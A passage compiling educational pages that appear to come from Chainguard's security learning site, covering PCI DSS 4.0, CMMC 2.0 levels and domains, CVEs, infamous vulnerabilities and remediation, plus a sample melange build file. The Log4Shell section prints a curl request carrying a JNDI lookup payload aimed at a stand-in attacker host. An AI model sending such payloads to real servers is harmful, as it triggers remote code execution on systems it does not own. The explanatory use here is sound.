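To make the declarative YAML format mentioned above more concrete, here is a minimal, hypothetical melange configuration sketch. The package name, version, and checksum placeholder are purely illustrative, and the pipeline steps shown (fetch and the autoconf helpers) are examples of the built-in pipelines referenced in the last question; consult the melange documentation for the exact fields your build requires.

# Illustrative melange build file (hello-demo is not a real package)
package:
  name: hello-demo
  version: 2.12.1
  epoch: 0
  description: Example package built with melange

environment:
  contents:
    repositories:
      - https://packages.wolfi.dev/os
    keyring:
      - https://packages.wolfi.dev/os/wolfi-signing.rsa.pub
    packages:
      - build-base
      - busybox

pipeline:
  # Built-in pipelines such as fetch, autoconf/configure, and autoconf/make
  # ship with melange itself.
  - uses: fetch
    with:
      uri: https://ftp.gnu.org/gnu/hello/hello-${{package.version}}.tar.gz
      expected-sha256: <checksum of the source tarball>
  - uses: autoconf/configure
  - uses: autoconf/make
  - uses: autoconf/make-install

A build like this would typically be run with melange build and, as noted above, signed with a key generated by melange keygen so that apko and other consumers can verify the resulting apk.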
---

## Section: 3

### Introduction to the PCI Data Security Standard (DSS) 4.0

URL: https://edu.chainguard.dev/software-security/compliance/pci-dss-4/intro-pci-dss-4/ Last Modified: August 21, 2024 Tags: compliance, PCI DSS 4.0, standards

PCI DSS 4.0, or Payment Card Industry Data Security Standard, is a global standard in the payments industry that includes a set of foundational technical and operational requirements surrounding the protection of payment data. Its goal is to ensure the security of information involved when payment cards are used and while those payments are processed. PCI DSS 4.0 replaces the earlier PCI DSS 3.2.1, which was retired in March 2024.

Cashless transactions have become the norm around the world. This is a convenient way for buyers and sellers to transact business, but it has also attracted the attention of criminals looking for easy money. Payment account information, especially payment card and card-owner data, is a frequent target. All payment system stakeholders have a responsibility to secure this information. PCI DSS helps to alleviate vulnerabilities and protect payment account data.

This guide will provide a comprehensive overview of PCI DSS 4.0, detailing its practices, the importance of compliance, and practical guidance on meeting its requirements. At the end of this guide, you will learn how Chainguard Containers can be used to significantly reduce the toil and time needed to achieve PCI DSS 4.0 compliance.

Who is Required to be Compliant?

The PCI Security Standards Council (PCI SSC) is a global forum for the industry to come together to develop, enhance, disseminate, and assist with the understanding of security standards for payment account security. The standards developed are agreed upon by all members and provide a measure of mutual trust across the industry. The standards are not directly developed or required by governmental entities, and the PCI DSS is not a law, but compliance is enforced by the PCI SSC through a yearly assessment.

Participation and membership in the PCI SSC is open globally to those affiliated with the payments industry. Compliance is expected of all members, is validated against PCI DSS 4.0, and is assessed using a set of defined testing procedures to verify that requirements are met. Membership in the PCI SSC includes:

- Merchants
- Banks
- Processors
- Hardware and software developers
- Point of sale vendors
- Payment brands, such as Visa, Mastercard, and American Express

Participation in the PCI SSC is encouraged for all industry stakeholders and is required for any who wish to participate in reviewing proposed additions or modifications to the standards. Regardless of membership status, all entities that store, process, or transmit cardholder data and/or sensitive authentication data are expected to comply with PCI DSS requirements.

What is the Importance of Protecting Payment Account Data?

Lax security enables criminals to steal and use consumer financial information from payment transactions and processing systems for fraudulent purposes.
Vulnerabilities may appear anywhere in the card-processing ecosystem, including but not limited to: Point of sale devices Cloud-based systems Mobile devices, personal computers, and servers Wireless hotspots Web shopping applications Paper-based storage systems The transmission of cardholder data to service providers Remote access connections These vulnerabilities may also extend to systems operated by service providers, such as the financial institutions that initiate and maintain the relationships with merchants that accept payment cards. Compliance with PCI DSS helps to alleviate these vulnerabilities and protect payment account data. Impact of Non-Compliance PCI DSS is designed to protect both customers and entities that handle payment data. Beyond the following, a failure to comply leaves you and your customers vulnerable to data and financial losses, most of which are preventable. Further, any entity that handles covered data and does not comply with PCI DSS requirements can expect: Fines and penalties from contracted partners, such as payment processors Data breach compensation costs, beyond just the initial losses Legal action A damaged reputation These consequences may further result in cancelled contracts, additional revenue losses, and even closures. Achieving compliance with PCI DSS 4.0 is not just an industry self-regulatory requirement but a critical step in safeguarding payment information. To prepare your organization for PCI DSS 4.0, continue on to the next section of our guide, PCI DSS 4.0 Maturity Levels, or read about how Chainguard Containers can help simplify fulfilling PCI DSS 4.0 requirements. Browse all PCI DSS 4.0 Articles (Current article) Introduction to PCI DSS 4.0 Overview of PCI DSS 4.0 Practices/Requirements How Chainguard Can Help With PCI DSS 4.0 Get started with FIPS Chainguard Containers today! --- ### Introduction to the Cybersecurity Maturity Model Certification (CMMC) 2.0 URL: https://edu.chainguard.dev/software-security/compliance/cmmc-2/intro-cmmc-2/ Last Modified: August 15, 2024 Tags: compliance, CMMC 2.0, standards CMMC 2.0, or Cybersecurity Maturity Model Certification, is a cybersecurity framework established by the U.S. Department of Defense (DoD). It aims to ensure that contractors and subcontractors within the Defense Industrial Base (DIB) comply with rigorous cybersecurity standards. CMMC 2.0 replaces the previous CMMC model with a streamlined and updated version that incorporates lessons learned and feedback from industry stakeholders. If you are a contractor, subcontractor, or supplier contracting with the DoD, you will need to meet the requirements of CMMC 2.0 regardless of the size of your organization or the type of product or service you are providing. This guide will provide a comprehensive overview of CMMC 2.0, detailing its practices, the importance of compliance, and practical guidance on meeting its requirements. At the end of this guide, you will learn how Chainguard Containers can be used to significantly reduce the toil and time needed to achieve CMMC 2.0 compliance. Who is Required to be Compliant? CMMC 2.0 compliance is mandatory for all organizations involved in DoD contracts where Controlled Unclassified Information (CUI) and Federal Contract Information (FCI) is handled. This includes: Prime Contractors: Organizations directly awarded contracts by the DoD that must meet specific CMMC certification levels based on contract requirements. 
Subcontractors: Companies providing goods or services to prime contractors, especially if they handle or access CUI or FCI. Suppliers: Entities within the supply chain that interact with sensitive information relevant to DoD projects. The DIB encompasses a wide variety of contractors and suppliers, including commercial firms, not-for-profit research centers and university laboratories, and government-owned industrial facilities. The products and services these entities provide are even more diverse, ranging from large sophisticated weapons platforms (e.g., missile defense systems) to highly specialized operational support (e.g., satellite communications) to general commercial products (e.g., medical equipment). Regardless of the type of organization or the product or service they provide, all contractors servicing the DIB must achieve compliance with CMMC 2.0. However, as we will discuss more below, the compliance requirements vary according to the specific CMMC maturity level required for the contract in question. What Are FCI and CUI? FCI refers to information provided by or generated for the government under a contract that is not intended for public release. It includes data related to the performance of government contracts but does not involve classified or highly sensitive information. For example, an office furniture supplier providing delivery schedules and product specifications to a government agency under a contract would be handling FCI. CUI is more sensitive and requires specific safeguarding and dissemination practices. CUI includes information that, while not classified, still requires protection under federal laws, regulations, or government-wide policies due to its potential impact on national security or other critical interests. A defense contractor managing blueprints for a new military vehicle that is not classified but still needs to be protected under export control laws would be handling CUI. Impact of Non-Compliance Failure to comply with CMMC 2.0 can have several significant impacts: Contract Loss: Organizations that do not meet the required CMMC level will be ineligible for DoD contracts, leading to a loss of business opportunities and revenue. Reputational Damage: Non-compliance can damage an organization’s reputation, affecting relationships with clients and partners and potentially deterring future business opportunities. Legal and Financial Penalties: Organizations may face legal actions and financial penalties, especially if a security breach occurs involving sensitive information. Increased Risk: Non-compliance increases the risk of data breaches and cyberattacks, which can compromise organizational and client data. Achieving compliance with CMMC 2.0 is not just a regulatory requirement but a critical step in safeguarding national security and contracting with the DoD. To prepare your organization for CMMC 2.0, continue on to the next section of our guide, CMMC 2.0 Maturity Levels, or read about how Chainguard Containers can help simplify fulfilling CMMC 2.0 requirements. Browse all CMMC 2.0 Articles (Current article) Introduction to CMMC 2.0 CMMC 2.0 Maturity Levels Overview of CMMC 2.0 Practice/Control Groups How Chainguard Can Help With CMMC 2.0 Get started with FIPS Chainguard Containers today! --- ### Sea-curing Software #1 - Fighting Vulnerabilities URL: https://edu.chainguard.dev/software-security/comics/fighting-vulnerabilities/ Last Modified: July 26, 2023 Tags: Comic, CVE --- ### What Are Software Vulnerabilities and CVEs? 
URL: https://edu.chainguard.dev/software-security/cves/cve-intro/ Last Modified: August 7, 2023 Tags: CVE, Overview A software vulnerability is a weakness in a program which, if left unaddressed, may be used by attackers to access, manipulate, or compromise a computer system. Vulnerabilities can be introduced at different stages of development and vary in their scope, criticality, and potential attack vector depending on their root cause. As a consequence, software developers spend time and resources triaging, remediating, and patching vulnerabilities to harden their software security and to prevent attackers from exploiting unintended program behavior. With software supply chain attacks on the rise, it is essential that developers and other technology professionals become knowledgeable about software vulnerabilities. Staying on top of the latest threats helps protect against targeted cyber attacks, ensuring the safety of important information and computer systems. Understanding software vulnerabilities is the first step in mitigating them in order to improve the security of the software you consume, develop, and release. In this article, you will be introduced to software vulnerabilities, examples of their causes and impacts, and learn how known vulnerabilities are documented through the CVE Program. What Makes a Vulnerability? Any party, process, or other input (like a dependency or package) involved in software production can introduce vulnerabilities into the final release. When third-party inputs used in development have software vulnerabilities, the resulting product may be impacted by them as well. Alternatively, developers writing their own code may unintentionally introduce vulnerabilities to a project through their programming, processes, or habits. If left unresolved, software weaknesses can advance to become vulnerabilities if hackers are able to exploit them via an attack. For example, not conducting input validation in a program could allow unfiltered or malicious input to affect the program, creating an improper input validation vulnerability. A notorious example of this is the Log4Shell vulnerability, which widely impacted many systems that used the Log4j logging utility. Attackers may target software vulnerabilities if they see an opportunity to compromise sensitive data or systems for their own benefit. They may choose to prioritize some vulnerabilities over others depending on how lucrative and accessible the opportunity is. Malicious actors can approach a vulnerability from different attack vectors depending on the weakness type being targeted. In some cases, attack vectors are easier to reach, meaning less leverage is required to expose and exploit the software’s weaknesses. The CVE Program Founded by the MITRE Corporation in 1999, the CVE Program was established with the goal to collect and document information surrounding known vulnerabilities in software products. Standing for Common Vulnerabilities and Exposures, CVEs are records of publicly disclosed software vulnerabilities. Over time, the program catalog has expanded to include over 200,000 software vulnerabilities, with more being added every day. The CVE Program is supported by the U.S. Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA). In addition, the CVE Program feeds the U.S. National Vulnerability Database (NVD), which provides additional information for each CVE entry. What Is a CVE? 
A CVE entry represents a known weakness in a software product and contains information to help address any potential risks to the integrity of a system caused by the vulnerability. Each CVE is assigned a unique CVE ID and is recorded with a description of the vulnerability, a list of affected software releases, any relevant references, and other pertinent information. CVE Numbering Authorities (CNAs) are the entities responsible for assigning CVE IDs. CNAs can be software vendors, research groups, open source sponsors, and similar organizations. When a new vulnerability is discovered and reported to a CNA, the CNA will request that a CVE ID is reserved for it. Once reserved, details are added to the CVE record and the entry is published to the database. Related Software Vulnerability Efforts While the CVE Program database functions stand-alone to communicate known vulnerabilities with developers, a variety of related efforts provide additional information and context to support the database. The Common Vulnerability Scoring System, or CVSS, is a metric which helps assess the severity of any given vulnerability and serves as a tool for developers who are determining which CVEs to address first. Similar to the CVE Program, MITRE also supports the Common Weaknesses Enumeration, or CWE. The CWE catalogs product-unspecific types of software weaknesses which may produce vulnerabilities if present in a program. The U.S. National Vulnerability Database (NVD) connects to the CVE database to provide further information regarding CVE entries. The NVD provides additional references and public advisories regarding each vulnerability. It also connects each CVE with a CVSS score, links a vulnerability’s associated CWE(s), and reports whether it is in the CISA’s Known Exploited Vulnerabilities (KEV) catalog. Learn More In this article, you were introduced to software vulnerabilities, learned about their characteristics, and how they are tracked in the CVE Program catalog. This understanding will help you to start triaging and addressing vulnerabilities present in the software you produce or consume to limit the potential for attackers to successfully exploit your systems. To learn more about software vulnerabilities, you can visit the CVE Program website, explore the NVD, or take a look at the KEV catalog. You can also check out our other articles on why you should care about vulnerabilities in your software, infamous software vulnerabilities, and our guide to addressing vulnerabilities in your software. --- ### CMMC 2.0 Maturity Levels URL: https://edu.chainguard.dev/software-security/compliance/cmmc-2/cmmc-2-levels/ Last Modified: August 15, 2024 Tags: compliance, CMMC 2.0, standards The Cybersecurity Maturity Model Certification (CMMC) 2.0 integrates various cybersecurity standards and best practices into a unified model that encompasses three maturity levels. Each level builds upon the previous one, with increasing rigor in cybersecurity practices and processes. In this article, we’ll provide an overview of the three levels of maturity and example practices that are representative of their requirements. Level 1: Foundational Contractors and subcontractors who handle only Federal Contract Information (FCI) typically need this level of certification. This is particularly relevant for small businesses that provide basic products or services without dealing with sensitive information. For example, a company supplying standard office supplies to a government agency would fall under this category. 
The focus at this level is on maintaining basic safeguards by implementing 17 fundamental cybersecurity practices. These practices are primarily derived from the Federal Acquisition Regulation (FAR) 52.204-21, a set of rules for government procurement in the United States. They are designed to protect FCI by ensuring that essential, straightforward protections are in place.

Documentation Requirements

At Level 1, the documentation requirements are minimal, focusing on basic cyber hygiene through the implementation of 17 foundational cybersecurity practices. The purpose is to establish essential protections without the need for extensive documentation. For example, organizations may maintain basic policies and procedures for access control, media protection, and physical security, along with records of security awareness training. The emphasis at this level is on demonstrating that these fundamental practices are in place, rather than producing detailed documentation, as required in higher levels.

Example Level 1 Practices

- Limiting information system access to authorized users.
- Conducting background checks on employees.
- Implementing basic measures such as antivirus and firewalls.

Level 2: Advanced

Contractors and subcontractors who handle Controlled Unclassified Information (CUI) but are not involved in critical defense programs typically need Level 2 certification. This is relevant for companies involved in more complex projects that deal with sensitive, though not highly classified, data. For instance, a contractor providing technical support for military communication systems, where sensitive but not classified information is exchanged, would require this level.

Level 2 consists of implementing the security requirements specified in NIST SP 800-171, totaling 110 practices. This level is designed as a transitional step for organizations aiming to achieve Level 3, building upon the foundational practices established in Level 1.

Documentation Requirements

At Level 2, the documentation requirements are moderate, reflecting the need for intermediate cyber hygiene and addressing a subset of the NIST SP 800-171 requirements. Organizations must maintain a System Security Plan (SSP) that outlines security strategies and vulnerability assessment and remediation plans. They must also create a Plan of Action and Milestones (POA&M) addressing any requirements that are not yet implemented. Other Level 2 documentation requirements may include audit logs, incident response reports, an inventory of the organization’s systems, the location of Controlled Unclassified Information (CUI) in the organization’s environment, and other documents related to the implementation and management of cybersecurity practices.

Example Level 2 Practices

- Implementing multifactor authentication.
- Conducting regular vulnerability assessments.
- Establishing and maintaining an operational incident-handling capability for organizational systems.

Level 3: Expert

Contractors handling highly sensitive CUI and involved in critical defense programs typically require this level of certification. This applies to large defense contractors developing advanced military technologies, such as a company designing next-generation fighter jets for the DoD. The focus at this level is on advanced and proactive cyber hygiene, requiring organizations to implement all 110 practices from NIST SP 800-171, along with additional practices from a subset of NIST SP 800-172.
This level demands advanced security measures to protect CUI against advanced persistent threats (APTs), such as cyber-espionage campaigns, zero-day exploits, and coordinated attacks targeting vulnerabilities in critical infrastructure. It requires government-led assessments every three years to maintain compliance. Documentation Requirements Level 3 requires the same documentation requirements as Level 2, including the System Security Plan (SSP) and Plan of Action and Milestones (POA&M). Further documentation requirements will become clear once the DoD determines which additional practices from NIST SP 800-172 will also be required. Example Level 3 Practices At the time of publication, specific Level 3 practices are still being determined. However, the Department of Defense has indicated that they will be pulled from a subset of NIST SP 800-172, Enhanced Security Requirements for Protecting Controlled Unclassified Information. Each CMMC level builds upon the previous one, ensuring that as organizations progress through the levels, their cybersecurity posture becomes more robust and capable of addressing increasingly sophisticated threats. This tiered approach allows organizations of varying sizes and capabilities to incrementally improve their cybersecurity measures while meeting the specific requirements necessary to handle sensitive information. To learn more about the specific required practices of CMMC 2.0, continue to the Overview of CMMC 2.0 Practice/Control Groups. Browse all CMMC 2.0 Articles Introduction to CMMC 2.0 CMMC 2.0 Maturity Levels (Current article) Overview of CMMC 2.0 Practice/Control Groups How Chainguard Can Help With CMMC 2.0 Get started with Chainguard FIPS Images today! --- ### Why Care About Software Vulnerabilities? URL: https://edu.chainguard.dev/software-security/cves/cve-why-care/ Last Modified: July 25, 2023 Tags: CVE, Overview Software products are prone to vulnerabilities which, if exploited by an attacker, may negatively impact the systems and consumers relying on them. Attacks against vulnerable software systems can result in the unintended exposure and misuse of sensitive data (like the theft of user account credentials). In other cases, these attacks could affect the provision of a service, or compromise critical infrastructure that relies on the software. Given the considerable threat that they can pose, it is important that developers spend time mitigating vulnerabilities to protect against hackers seeking to exploit them. Addressing the vulnerabilities present in your software helps secure the systems you support, use, and maintain. In this article, you will explore why you should care about vulnerabilities as a software developer, and learn about federal regulations that draw importance to CVE management. As a Developer Discovering and mitigating software vulnerabilities is a difficult – but necessary – task for developers to tackle. Development teams are ultimately the authorities who are able to remediate vulnerabilities at the source. Depending on the severity of a vulnerability, its exploitation could significantly impact the integrity of the software product. The trust, safety, and operations of the consumers who rely on the software may be affected as well. Vulnerability triage is an important step developers must take to work toward reducing risks posed by vulnerabilities in their software. Using vulnerability scanners can give developers information about the number, type, and severity of CVEs present in their work.
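For example, pointing an open source scanner at one of your own artifacts produces exactly this kind of report. The sketch below is illustrative; the image name is a placeholder, and the exact output format depends on the scanner you choose.

```shell
# List known CVEs in a container image, along with their severities (Grype)
grype registry.example.com/my-app:1.2.3

# Or report only the most severe findings (Trivy)
trivy image --severity HIGH,CRITICAL registry.example.com/my-app:1.2.3
```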
With this data, developers can prioritize critical CVEs, therefore ensuring that major security concerns are addressed first. Federal Regulations With notable software supply chain security attacks occurring in recent years (such as the SolarWinds attack in 2020), the U.S. federal government has increased efforts to improve U.S. cybersecurity. These initiatives aim to strengthen software supply chain security by promoting safer development habits, such as frequent vulnerability scanning. FedRAMP The Federal Risk and Authorization Management Program (FedRAMP) is a security framework that must be adopted by cloud service providers (CSPs) before they service U.S. federal government agencies. The framework aims to promote the use of cloud services across agencies by standardizing security authorization practices. Based on the service being offered, FedRAMP sorts cloud services into low, moderate, and high impact levels, with increased security expectations for each level. In order to achieve FedRAMP authorization, certain requirements need to be met as follows: Container images used by CSPs must be hardened according to benchmarks laid out in the NIST SP 800-70. Our solution is Chainguard Containers, which offers hardened, minimal base images designed to help you meet FedRAMP compliance requirements. Vulnerability scanners are expected to report information about discovered vulnerabilities, such as its CVE ID and CVSSv3 score. Additional configuration requirements can be found in the FedRAMP Vulnerability Scanning Requirements outline. Meeting FedRAMP container image and vulnerability scanning requirements allows your organization to expand and reinforce its offerings as a CSP. To learn how we can help you meet FedRAMP container image requirements, check out our blog post on how you can Fortify, comply and conquer FedRAMP with Chainguard Containers. DHS Software Self Attestation The Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) released their Secure Software Attestation Form in response to Executive Order 14028. The attestation form identifies the secure software development practices that developers must verify to have met in order for their software to be utilized by federal agencies. Meeting the criteria laid out by the form is another critical step toward securing your software development processes. Learn More In this article, we discussed reasons why you should care about software vulnerabilities from a development perspective. In addition, you were introduced to federal regulations that draw importance to vulnerability management and secure development practices. This knowledge will help you begin managing vulnerabilities present in the software you develop, improving your security profile and giving you a head start toward meeting regulations like FedRAMP. To learn more about the importance of software vulnerability management and meeting federal regulations, you can explore requirements for complying with FedRAMP, or learn how Chainguard Containers can help reduce CVEs in your container images. --- ### Overview of PCI DSS 4.0 Practices/Requirements URL: https://edu.chainguard.dev/software-security/compliance/pci-dss-4/pci-dss-practices/ Last Modified: August 21, 2024 Tags: compliance, PCI DSS 4.0, standards PCI DSS 4.0, or Payment Card Industry Data Security Standard is intended for all entities that store, process, or transmit cardholder data and/or authentication data that could impact the security of the cardholder data environment. 
This includes all entities interacting with information such as the following: Cardholder Data, including the primary account number, cardholder name, and expiration date; and Authentication Data, including full track data (such as on a magnetic stripe or chip), the card verification code (the number on the back of the card), and PINs. PCI DSS 4.0 requires compliance with a set of requirements, each related to an information security practice or goal. All of these are intended to protect cardholder data from theft and fraud. PCI DSS 4.0 Goals and Requirements Below is a table overview with a high-level description of the goals and requirements, summarized from the PCI DSS v4.0 Quick Reference Guide from the PCI Security Standards Council, available from their Document Library:

| Goals | Requirements |
| --- | --- |
| Build and maintain a secure network and systems | Install and maintain network security controls and apply secure configurations to all system components |
| Protect account data | Protect stored account data as well as account data transmitted over open, public networks |
| Maintain a vulnerability management program | Protect all systems and networks from malicious software; develop and maintain secure systems and software |
| Implement strong access control measures | Restrict access to system components and cardholder data by business need to know, identify users and authenticate access to system components, restrict physical access to cardholder data |
| Regularly monitor and test networks | Log and monitor all access to system components and cardholder data, test security of all systems regularly |
| Maintain an information security policy | Support information security with organizational policies and programs |

For a list of all required practices, see the PCI DSS documentation available in the PCI Security Standards Council’s Document Library. Browse all PCI DSS 4.0 Articles Introduction to PCI DSS 4.0 Overview of PCI DSS 4.0 Practices/Requirements (Current article) How Chainguard Can Help With PCI DSS 4.0 Get started with Chainguard FIPS Images today! --- ### Overview of CMMC 2.0 Practices/Control Groups URL: https://edu.chainguard.dev/software-security/compliance/cmmc-2/cmmc-practices/ Last Modified: August 15, 2024 Tags: compliance, CMMC 2.0, standards Cybersecurity Maturity Model Certification (CMMC) 2.0 requires a progressive set of practices. Level 1 has 17 practices. Level 2 includes Level 1 practices plus an additional 110 practices. Level 3 practices include Level 2 practices, plus additional practices that are still being determined. These practices are divided into 14 domains, each of which covers a different aspect of cybersecurity. Wait, you may be wondering. Are “practices” the same as “controls” or “requirements”? This can be a point of confusion, as CMMC 2.0 refers to its requirements as “practices”, yet the majority are taken from NIST SP 800-171 and NIST SP 800-172 standards or requirements. Naming Conventions for CMMC 2.0 Practices/Controls CMMC 2.0 practices are labeled using the format “DD.L#-REQ”, where DD is the two-letter domain abbreviation, L# is the level number, and REQ is the NIST SP 800-171 Rev 2 or NIST SP 800-172 security requirement number. CMMC 2.0 Practice/Control Domains Below is a table overview of the domains:

| Domain | Description | Example Practice/Control |
| --- | --- | --- |
| Access Control (AC) | Manage and restrict access to information systems to ensure that only authorized users and processes can interact with the system, protecting sensitive data from unauthorized access. | AC.L1-3.1.22 - Control information posted or processed on publicly accessible information systems. |
| Awareness and Training (AT) | Ensure that personnel are educated on cybersecurity practices and aware of their roles in maintaining security, improving overall organizational resilience against cyber threats. | AT.L2-3.2.3 - Provide security awareness training on recognizing and reporting potential indicators of insider threat. |
| Audit and Accountability (AU) | Involve the logging and monitoring of system activities to track and review actions, ensuring accountability and providing a means to detect and respond to potential security incidents. | AU.L2-3.3.2 - Ensure that the actions of individual system users can be uniquely traced to those users so they can be held accountable for their actions. |
| Configuration Management (CM) | Establish and maintain secure configurations for information systems to prevent vulnerabilities, ensuring that systems are set up and managed in a consistent and secure manner. | CM.L2-3.4.2 - Establish and enforce security configuration settings for information technology products employed in organizational systems. |
| Identification and Authentication (IA) | Focus on verifying the identity of users and devices to ensure that only authorized individuals and systems can access or interact with the organization’s information assets. | IA.L2-3.5.5 - Prevent reuse of identifiers for a defined period. |
| Incident Response (IR) | Prepare for and respond to cybersecurity incidents through structured plans and regular testing, ensuring that the organization can effectively manage and mitigate the impact of incidents. | IR.L2-3.6.2 - Track, document, and report incidents to designated officials and/or authorities both internal and external to the organization. |
| Maintenance (MA) | Maintain and update systems, ensuring that maintenance activities are performed securely. | MA.L2-3.7.1 - Perform maintenance on organizational systems. |
| Media Protection (MP) | Protect information stored on physical and digital media through encryption and other security measures to safeguard data from unauthorized access and exposure. | MP.L2-3.8.2 - Limit access to Controlled Unclassified Information (CUI) on system media to authorized users. |
| Personnel Security (PS) | Manage security risks related to personnel by ensuring thorough background checks and security clearances, addressing potential vulnerabilities from insider threats. | PS.L2-3.9.1 - Screen individuals prior to authorizing access to organizational systems containing CUI. |
| Physical Protection (PE) | Protect physical locations and systems through access controls, surveillance, and other security measures to prevent unauthorized physical access and potential tampering. | PE.L1-3.10.3 - Escort visitors and monitor visitor activity. |
| Risk Assessment (RA) | Assess and remediate risks and vulnerabilities in organizational operations, assets, and systems. | RA.L2-3.11.2 - Scan for vulnerabilities in organizational systems and applications periodically. |
| Security Assessment (CA) | Evaluate the effectiveness of security controls through assessments and address any identified vulnerabilities to continuously improve the security posture. | CA.L2-3.12.1 - Periodically assess the security controls in organizational systems to determine if the controls are effective in their application. |
| System and Communications Protection (SC) | Secure communications and data transmitted across networks to protect information from interception and unauthorized access. | SC.L2-3.13.3 - Separate user functionality from system management functionality. |
| System and Information Integrity (SI) | Ensure the integrity of systems and information by monitoring for unauthorized changes, protecting against malicious code, and applying updates to maintain system security. | SI.L2-3.14.7 - Identify unauthorized use of organizational systems. |

For a list of all required practices, see pages 9 to 18 in the Cybersecurity Maturity Model Certification - Model Overview published by Carnegie Mellon University and The Johns Hopkins University Applied Physics Laboratory LLC and funded by the Department of Defense (DoD). To learn more about requirements for tracking compliance, continue to the next article in our guide, CMMC 2.0 Documentation Requirements. Browse all CMMC 2.0 Articles Introduction to CMMC 2.0 CMMC 2.0 Maturity Levels Overview of CMMC 2.0 Practice/Control Groups (Current article) How Chainguard Can Help With CMMC 2.0 Get started with Chainguard FIPS Images today! --- ### Infamous Software Vulnerabilities URL: https://edu.chainguard.dev/software-security/cves/infamous-cves/ Last Modified: July 26, 2023 Tags: CVE, Overview Software vulnerabilities vary in their severity – some are difficult to exploit and have minimal implications, while others can be exploited easily, giving an attacker significant leverage over a computer system. In cases where widely-implemented software contains high-severity vulnerabilities, the damage caused by their exploitation can affect millions of developers and services worldwide. In this article, you will learn how the KEV Catalog tracks known exploited software vulnerabilities, and how it serves as a tool for developers and federal agencies. In addition, you will explore Log4Shell, Heartbleed, and Shellshock, three infamous software vulnerabilities which have had major impacts on software security worldwide. CISA KEV Catalog The U.S. Cybersecurity and Infrastructure Security Agency (CISA) operates the Known Exploited Vulnerabilities (KEV) Catalog, which is populated with CVEs that have existing exploits “in the wild”. The KEV Catalog serves as a tool for developers as it identifies CVEs that need to be prioritized for remediation because of their exploitability status. Federal civilian executive branch agencies must remediate vulnerabilities present in the KEV Catalog by a due date specified by the CISA. Focusing on patching out these vulnerabilities limits the ability of attackers to find a potential known route into a system. Some of the vulnerabilities in the KEV Catalog are infamous for the impacts of their exploitation. When a vulnerability affects a piece of software present in an array of systems, its exploitation can reach far and wide, and efforts to remediate it can be difficult to fully implement. The following vulnerabilities are present in the KEV Catalog and serve as examples of how damaging ubiquitous software vulnerabilities can be. Log4Shell (CVE-2021-44228) Log4Shell is a vulnerability impacting the Apache Log4j Java logging utility, a popular library used on millions of devices worldwide. The vulnerability allows an attacker to perform a remote code execution (RCE) attack by logging a string that triggers a Java Naming and Directory Interface (JNDI) endpoint lookup. An attacker can exploit this behavior by pointing the JNDI lookup at a server under their control that serves malicious code. This vulnerability has affected Log4j since version 2.0-beta9 (released in 2013), and was patched out in version 2.16.0 in 2021.
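To make the mechanism concrete: on a vulnerable Log4j 2.x version, any attacker-controlled string that ends up being logged (an HTTP header, a username, a chat message) can trigger the lookup. The request below is purely illustrative and uses placeholder hostnames.

```shell
# Illustrative only: if the application logs the User-Agent header with a
# vulnerable Log4j version, this string causes a JNDI lookup to the
# attacker-controlled server, which can respond with code for the victim to run.
curl -H 'User-Agent: ${jndi:ldap://attacker.example/a}' https://victim.example/
```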
Due to the popularity of Log4j, Log4Shell was extremely pervasive, impacting a variety of services such as those offered by Amazon Web Services and IBM, among others. Its widespread use makes this vulnerability difficult to completely remediate as it may be unknown if a vulnerable version of Log4j is present on a system, such as in the case of a federal network being affected months after the vulnerability was first documented. To learn more about Log4Shell, check out its listing on the Apache Log4j Security Vulnerabilities page. Heartbleed (CVE-2014-0160) Heartbleed is a buffer over-read vulnerability in OpenSSL, a popular cryptographic library commonly used for encrypting SSL/TLS communications on the internet. The vulnerability allows an attacker to read the memory of a system without detection. As a result, cryptographic keys, credentials, and other content can be silently extracted from a server’s memory. Heartbleed affected OpenSSL versions 1.0.1-1.0.1f (inclusive) and was discovered in 2014, about two years after the vulnerability was first introduced to OpenSSL. Due to its undetectable nature, determining if it was exploited against a particular server is difficult. It was estimated at the time of discovery that around half a million websites may have been vulnerable to the bug. To learn more about the Heartbleed vulnerability, check out the Heartbleed website. Shellshock (CVE-2014-6271) Shellshock is an arbitrary code execution vulnerability which went unnoticed for 25 years, existing in Bash since 1989 and first being reported in version 4.3 in 2014. Through this vulnerability, commands that should be inaccessible can instead be executed through Bash’s function export feature. In affected versions, Bash processes function definitions stored in environment variables, causing the unintended behavior that enables malicious code to be run. Following the initial CVE report, further CVEs were soon filed addressing additional related vulnerabilities. As Shellshock was not discovered for over two decades after its inception, the scope of its influence is significant, with it still being leveraged against systems today. Soon after the vulnerability was uncovered, large-scale attacks using botnets were deployed against high-profile entities like the U.S. Department of Defense. To learn more about Shellshock and its related vulnerabilities, check out the CISA’s Shellshock alert. Learn More In this article, you learned how the CISA’s KEV Catalog tracks exploited vulnerabilities, and how the catalog is used by developers and federal agencies to prioritize vulnerability remediation. You also explored three infamous software vulnerabilities: Log4Shell, Heartbleed, and Shellshock, and learned how they have impacted systems across the world. To learn more about these vulnerabilities and other exploited vulnerabilities, dive further into the KEV Catalog, or check out the full CVE database. --- ### Software Vulnerability Remediation URL: https://edu.chainguard.dev/software-security/cves/cve-remediation/ Last Modified: August 10, 2023 Tags: CVE, Overview At worst, a software vulnerability can impose a critical security flaw that warrants attention. Developers care about mitigating software vulnerabilities because their presence may harm the integrity of their product, negatively affect downstream users, or slow down efforts toward meeting regulatory requirements. 
However, modern software development practices which incorporate third-party packages in addition to newly scripted code can complicate the vulnerability remediation process. Keeping track of how and where vulnerabilities are introduced, as well as what introduced them, is an arduous task when multitudes of dependencies are working together. In this article, you will explore some steps you can take to make vulnerability remediation easier from start to finish. You will begin by learning how various tools can help you catalog the components of your software. Next, you will move on to identifying, triaging, and remediating vulnerabilities, and learn how to address vulnerabilities present in container images. Step 1 — Knowing Your Software Vulnerability remediation can be difficult when your code incorporates a wide array of packages. On top of this, projects often rely on dependencies which have their own dependencies (called transitive dependencies), thus further adding to the layers which compose a piece of software. When working on large-scale projects with hundreds of files, dependencies, and collaborators, keeping track of everything can become overwhelming. To combat this, an SBOM, or Software Bill of Materials, can be used. SBOMs are machine-readable documents that track the dependencies of a project. A good SBOM includes dependency names and their version numbers, enabling accurate identification of every component. By using an SBOM to catalog project dependencies, you can gain insight into the many inputs comprising a piece of software. In addition to generating an SBOM for your project, you can take your software security one step further with the use of attestations, which guarantee the provenance of a software artifact. Establishing provenance of an artifact ensures that it has not been altered after generation, enabling trust and confidence in its composition. To learn more about using SBOMs and attestations to secure your software supply chain, check out our article comparing the two options. Step 2 — Vulnerability Scanning After taking steps to understand and catalog your software components, you can move on to scanning for vulnerabilities. A vulnerability scanner is a tool which ingests databases of known software vulnerabilities 